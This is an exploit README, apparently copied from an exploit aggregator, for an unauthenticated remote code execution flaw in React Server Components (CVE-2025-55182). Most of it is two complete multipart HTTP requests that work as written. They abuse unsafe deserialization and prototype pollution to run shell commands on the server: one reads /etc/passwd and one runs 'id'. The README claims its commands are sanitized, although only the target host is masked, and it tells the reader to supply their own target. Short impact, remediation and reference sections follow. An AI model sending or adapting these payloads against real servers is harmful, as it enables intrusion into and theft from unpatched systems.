Share
## https://sploitus.com/exploit?id=ED873EF8-6E06-5CA1-AE6D-665A566DB7B4
# React Server Components RCE – README


## Description

React Server Components versions **19.0.0**, **19.1.0**, **19.1.1**, and **19.2.0**, including
`react-server-dom-parcel`, `react-server-dom-turbopack`, and `react-server-dom-webpack`, contain a remote code execution vulnerability.

The issue is triggered by **unsafe deserialization** of attacker‑controlled payloads sent to Server Function endpoints.

---

## PoC – Complete Request (Sanitized)

Below is the **full HTTP request** demonstrating the vulnerability, with sensitive commands replaced with placeholders.
Replace **redacted.com** with your target host.

```
POST / HTTP/1.1
Host: redacted.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 721

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('cat /etc/passwd|tr \"\\n\" \"@\"').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```




## id Command 

```
POST / HTTP/1.1
Host: redecated.com
Sec-Ch-Ua: "Not=A?Brand";v="24", "Chromium";v="140"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Next-Action: x
X-Nextjs-Request-Id: b5dce965
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Length: 691

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('id').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```





**PoC summary:**

* The server deserializes structured payloads from the multipart request.
* Unsafe deserialization allows an attacker to influence execution flow.
* Sensitive commands have been replaced with placeholders for safety.

---

## Impact

Unauthenticated attackers can execute arbitrary code remotely, potentially leading to **full system compromise**.

---

## Remediation

Update to the **latest React Server Components release** where unsafe deserialization paths are patched.

---

## References

* [https://github.com/assetnote/react2shell-scanner](https://github.com/assetnote/react2shell-scanner)
* [https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3](https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3)
* [https://www.facebook.com/security/advisories/cve-2025-55182](https://www.facebook.com/security/advisories/cve-2025-55182)
* [http://www.openwall.com/lists/oss-security/2025/12/03/4](http://www.openwall.com/lists/oss-security/2025/12/03/4)
* [https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
* [https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp](https://github.com/vercel/next.js/security/advisories/GHSA-9qr9-h5gf-34mp)
* [https://vercel.com/changelog/cve-2025-55182](https://vercel.com/changelog/cve-2025-55182)

---

May you be well on your side of the screen :) ✨❤️

---